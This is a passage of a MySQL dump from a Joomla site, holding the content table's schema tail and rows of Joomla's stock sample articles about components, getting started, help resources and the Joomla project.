`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`images` text NOT NULL,
`urls` text NOT NULL,
`attribs` varchar(5120) NOT NULL,
`version` int(10) unsigned NOT NULL DEFAULT 1,
`ordering` int(11) NOT NULL DEFAULT 0,
`metakey` text NOT NULL,
`metadesc` text NOT NULL,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`metadata` text NOT NULL,
`featured` tinyint(3) unsigned NOT NULL DEFAULT 0 COMMENT 'Set if article is featured.',
`language` char(7) NOT NULL COMMENT 'The language code for the article.',
`xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
PRIMARY KEY (`id`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_state` (`state`),
KEY `idx_catid` (`catid`),
KEY `idx_createdby` (`created_by`),
KEY `idx_featured_catid` (`featured`,`catid`),
KEY `idx_language` (`language`),
KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB AUTO_INCREMENT=86 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_content`
--
LOCK TABLES `atlyh_content` WRITE;
/*!40000 ALTER TABLE `atlyh_content` DISABLE KEYS */;
INSERT INTO `atlyh_content` VALUES (1,89,'Administrator Components','administrator-components','<p>All components are also used in the administrator area of your website. In addition to the ones listed here, there are components in the administrator that do not have direct front end displays, but do help shape your site. The most important ones for most users are</p>\r\n<ul>\r\n<li>Media Manager</li>\r\n<li>Extensions Manager</li>\r\n<li>Menu Manager</li>\r\n<li>Global Configuration</li>\r\n<li>Banners</li>\r\n<li>Redirect</li>\r\n</ul>\r\n<hr title=\"Media Manager\" alt=\"Media Manager\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<p> </p>\r\n<h3>Media Manager</h3>\r\n<p>The media manager component lets you upload and insert images into content throughout your site. Optionally, you can enable the flash uploader which will allow you to to upload multiple images. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Content_Media_Manager\">Help</a></p>\r\n<hr title=\"Extensions Manager\" alt=\"Extensions Manager\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<h3>Extensions Manager</h3>\r\n<p>The extensions manager lets you install, update, uninstall and manage all of your extensions. The extensions manager has been extensively redesigned, although the core install and uninstall functionality remains the same as in Joomla! 1.5. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Extensions_Extension_Manager_Install\">Help</a></p>\r\n<hr title=\"Menu Manager\" alt=\"Menu Manager\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<h3>Menu Manager</h3>\r\n<p>The menu manager lets you create the menus you see displayed on your site. It also allows you to assign modules and template styles to specific menu links. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Menus_Menu_Manager\">Help</a></p>\r\n<hr title=\"Global Configuration\" alt=\"Global Configuration\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<h3>Global Configuration</h3>\r\n<p>The global configuration is where the site administrator configures things such as whether search engine friendly urls are enabled, the site meta data (descriptive text used by search engines and indexers) and other functions. For many beginning users simply leaving the settings on default is a good way to begin, although when your site is ready for the public you will want to change the meta data to match its content. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Site_Global_Configuration\">Help</a></p>\r\n<hr title=\"Banners\" alt=\"Banners\" class=\"system-pagebreak\" style=\"color: gray; border: 1px dashed gray;\" />\r\n<h3>Banners</h3>\r\n<p>The banners component provides a simple way to display a rotating image in a module and, if you wish to have advertising, a way to track the number of times an image is viewed and clicked. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Components_Banners_Banners_Edit\">Help</a></p>\r\n<hr title=\"Redirect\" class=\"system-pagebreak\" />\r\n<h3><br />Redirect</h3>\r\n<p>The redirect component is used to manage broken links that produce Page Not Found (404) errors. If enabled it will allow you to redirect broken links to specific pages. It can also be used to manage migration related URL changes. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Components_Redirect_Manager\">Help</a></p>','',-2,21,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,7,'','',1,7,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(8,104,'Beginners','beginners','<p>If this is your first Joomla! site or your first web site, you have come to the right place. Joomla will help you get your website up and running quickly and easily.</p>\r\n<p>Start off using your site by logging in using the administrator account you created when you installed Joomla.</p>\r\n','\r\n<p>Explore the articles and other resources right here on your site data to learn more about how Joomla works. (When you\'re done reading, you can delete or archive all of this.) You will also probably want to visit the Beginners\' Areas of the <a href=\"http://docs.joomla.org/Beginners\">Joomla documentation</a> and <a href=\"http://forum.joomla.org\">support forums</a>.</p>\r\n<p>You\'ll also want to sign up for the Joomla Security Mailing list and the Announcements mailing list. For inspiration visit the <a href=\"http://community.joomla.org/showcase/\">Joomla! Site Showcase</a> to see an amazing array of ways people use Joomla to tell their stories on the web.</p>\r\n<p>The basic Joomla installation will let you get a great site up and running, but when you are ready for more features the power of Joomla is in the creative ways that developers have extended it to do all kinds of things. Visit the <a href=\"http://extensions.joomla.org/\">Joomla! Extensions Directory</a> to see thousands of extensions that can do almost anything you could want on a website. Can\'t find what you need? You may want to find a Joomla professional in the <a href=\"http://resources.joomla.org/\">Joomla! Resource Directory</a>.</p>\r\n<p>Want to learn more? Consider attending a <a href=\"http://community.joomla.org/events.html\">Joomla! Day</a> or other event or joining a local <a href=\"http://community.joomla.org/user-groups.html\">Joomla! Users Group</a>. Can\'t find one near you? Start one yourself.</p>',-2,19,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,4,'','',1,3,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(9,105,'Contacts','contact','<p>The contact component provides a way to provide contact forms and information for your site or to create a complex directory that can be used for many different purposes. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Components_Contacts_Contacts\">Help</a></p>','',-2,21,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',1,2,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(10,106,'Content','content','<p>The content component (com_content) is what you use to write articles. It is extremely flexible and has the largest number of built in views. Articles can be created and edited from the front end, making content the easiest component to use to create your site content. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Content_Article_Manager\">Help</a></p>','',-2,21,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',1,1,'','',1,3,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(21,119,'Getting Help','getting-help','<p> There are lots of places you can get help with Joomla!. In many places in your site administrator you will see the help icon. Click on this for more information about the options and functions of items on your screen. Other places to get help are:</p>\r\n<ul>\r\n<li><a href=\"http://forum.joomla.org\">Support Forums</a></li>\r\n<li><a href=\"http://docs.joomla.org\">Documentation</a></li>\r\n<li><a href=\"http://resources.joomla.org\">Professionals</a></li>\r\n<li><a href=\"http://shop.joomla.org/amazoncom-bookstores.html\">Books</a></li>\r\n</ul>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','2012-09-25 07:39:17',123,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,8,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(22,120,'Getting Started','getting-started','<p>It\'s easy to get started creating your website. Knowing some of the basics will help.</p>\r\n<h3>What is a Content Management System?</h3>\r\n<p>A content management system is software that allows you to create and manage webpages easily by separating the creation of your content from the mechanics required to present it on the web.</p>\r\n<p>In this site, the content is stored in a <em>database</em>. The look and feel are created by a <em>template</em>. The Joomla! software brings together the template and the content to create web pages.</p>\r\n<h3>Site and Administrator</h3>\r\n<p>Your site actually has two separate sites. The site (also called the front end) is what visitors to your site will see. The administrator (also called the back end) is only used by people managing your site. You can access the administrator by clicking the \"Site Administrator\" link on the \"This Site\" menu or by adding /administrator to the end of you domain name.</p>\r\n<p>Log in to the administrator using the username and password created during the installation of Joomla.</p>\r\n<h3>Logging in</h3>\r\n<p>To login to the front end of your site use the login form or the login menu link on the \"This Site\" menu. Use the user name and password that were created as part of the installation process. Once logged-in you will be able to create and edit articles.</p>\r\n<p>In managing your site, you will be able to create content that only logged-in users are able to see.</p>\r\n<h3>Creating an article</h3>\r\n<p>Once you are logged-in, a new menu will be visible. To create a new article, click on the \"submit article\" link on that menu.</p>\r\n<p>The new article interface gives you a lot of options, but all you need to do is add a title and put something in the content area. To make it easy to find, set the state to published and put it in the Joomla category.</p>\r\n<div>You can edit an existing article by clicking on the edit icon (this only displays to users who have the right to edit).</div>\r\n<h3>Learn more</h3>\r\n<p>There is much more to learn about how to use Joomla! to create the web site you envision. You can learn much more at the <a href=\"http://docs.joomla.org\">Joomla! documentation site</a> and on the<a href=\"http://forum.joomla.org\"> Joomla! forums</a>.</p>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,9,'','',1,68,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(24,122,'Joomla!','joomla','<p>Congratulations! You have a Joomla site! Joomla makes it easy to build a website just the way you want it and keep it simple to update and maintain.</p>\r\n<p>Joomla is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors. Joomla is open source, which means you can make it work just the way you want it to.</p>\r\n<p>The content in this installation of Joomla has been designed to give you an in depth tour of Joomla\'s features.</p>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','2012-09-25 12:19:00',123,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,2,'','',1,10,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(32,130,'Options','options','<p>As you make your Joomla! site you will control the details of the display using <em>options</em> also referred to as <em>parameter</em><strong>s</strong>. Options control everything from whether the author\'s name is displayed to who can view what to the number of items shown on a list.</p>\r\n<p>Default options for each component are changed using the Options button on the component toolbar.</p>\r\n<p>Options can also be set on an individual item, such as an article or contact and in menu links.</p>\r\n<p>If you are happy with how your site looks, it is fine to leave all of the options set to the defaults that were created when your site was installed. As you become more experienced with Joomla you will use options more.</p>\r\n<p> </p>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,10,'','',1,8,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(35,133,'Professionals','professionals','<p>Joomla! 3 continues development of the Joomla Platform and CMS as a powerful and flexible way to bring your vision of the web to reality. With the new administrator interface and adoption of Twitter Bootstrap, the ability to control its look and the management of extensions is now complete.</p>\r\n','\r\n<p>Working with multiple template styles and overrides for the same views, creating the design you want is easier than it has ever been. Limiting support to PHP 5.3.10 and above makes Joomla lighter and faster than ever. </p>\r\n<p>The separation of the Joomla! Platform project from the Joomla! CMS project makes continuous development of new, powerful APIs and continuous improvement of existing APIs possible while maintaining the stability of the CMS that millions of webmasters and professionals rely upon.</p>',-2,19,'2011-01-01 00:00:01',692,'Joomla','2012-09-25 07:14:30',123,0,'0000-00-00 00:00:00','2011-01-09 16:41:13','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,5,'','',1,43,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(38,136,'Sample Sites','sample-sites','<p>Your installation includes sample data, designed to show you some of the options you have for building your website. In addition to information about Joomla! there are two sample \"sites within a site\" designed to help you get started with building your own site.</p>\r\n<p>The first site is a simple site about <a href=\"index.php?Itemid=243\">Australian Parks</a>. It shows how you can quickly and easily build a personal site with just the building blocks that are part of Joomla. It includes a personal blog, weblinks, and a very simple image gallery.</p>\r\n<p>The second site is slightly more complex and represents what you might do if you are building a site for a small business, in this case a <a href=\"index.php/welcome.html\"></a><a href=\"index.php?Itemid=429\">Fruit Shop</a>.</p>\r\n<p>In building either style site, or something completely different, you will probably want to add <a href=\"http://extensions.joomla.org\">extensions</a> and either create or purchase your own template. Many Joomla users start by modifying the <a href=\"http://docs.joomla.org/How_do_you_modify_a_template%3F\">templates</a> that come with the core distribution so that they include special images and other design elements that relate to their site\'s focus.</p>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,11,'','',1,15,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(39,137,'Search','search-component','<p>Joomla! 2.5 offers two search options.</p>\r\n<p>The Basic Search component provides basic search functionality for the information contained in your core components. Many extensions can also be searched by the search component. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Components_Search\">Help</a></p>\r\n<p>The Smart Search component offers searching similar to that found in major search engines. Smart Search is disabled by default. If you choose to enable it you will need to take several steps. First, enable the Smart Search Plugin in the plugin manager. Then, if you are using the Basic Search Module replace it with the Smart Search Module. Finally, if you have already created content, go to the Smart Search component in your site administrator and click the Index icon. Once indexing of your content is complete, Smart Search will be ready to use. Help.</p>','',-2,21,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,3,'','',1,16,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(47,145,'The Joomla! Community','the-joomla-community','<p>Joomla means All Together, and it is a community of people all working and having fun together that makes Joomla possible. Thousands of people each year participate in the Joomla community, and we hope you will be one of them.</p>\r\n<p>People with all kinds of skills, of all skill levels and from around the world are welcome to join in. Participate in the <a href=\"http://joomla.org\">Joomla.org</a> family of websites (the<a href=\"http://forum.joomla.org\"> forum </a>is a great place to start). Come to a <a href=\"http://community.joomla.org/events.html\">Joomla! event</a>. Join or start a <a href=\"http://community.joomla.org/user-groups.html\">Joomla! Users Group</a>. Whether you are a developer, site administrator, designer, end user or fan, there are ways for you to participate and contribute.</p>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,3,'','',1,2,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(48,146,'The Joomla! Project','the-joomla-project','<p>The Joomla Project consists of all of the people who make and support the Joomla Web Platform and Content Management System.</p>\r\n<p>Our mission is to provide a flexible platform for digital publishing and collaboration.</p>\r\n<p>The core values are:</p>\r\n<ul>\r\n<li>Freedom</li>\r\n<li>Equality</li>\r\n<li>Trust</li>\r\n<li>Community</li>\r\n<li>Collaboration</li>\r\n<li>Usability</li>\r\n</ul>\r\n<p>In our vision, we see:</p>\r\n<ul>\r\n<li>People publishing and collaborating in their communities and around the world</li>\r\n<li>Software that is free, secure, and high-quality</li>\r\n<li>A community that is enjoyable and rewarding to participate in</li>\r\n<li>People around the world using their preferred languages</li>\r\n<li>A project that acts autonomously</li>\r\n<li>A project that is socially responsible</li>\r\n<li>A project dedicated to maintaining the trust of its users</li>\r\n</ul>\r\n<p>There are millions of users around the world and thousands of people who contribute to the Joomla Project. They work in three main groups: the Production Working Group, responsible for everything that goes into software and documentation; the Community Working Group, responsible for creating a nurturing the community; and Open Source Matters, the non profit organization responsible for managing legal, financial and organizational issues.</p>\r\n<p>Joomla is a free and open source project, which uses the GNU General Public License version 2 or later.</p>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 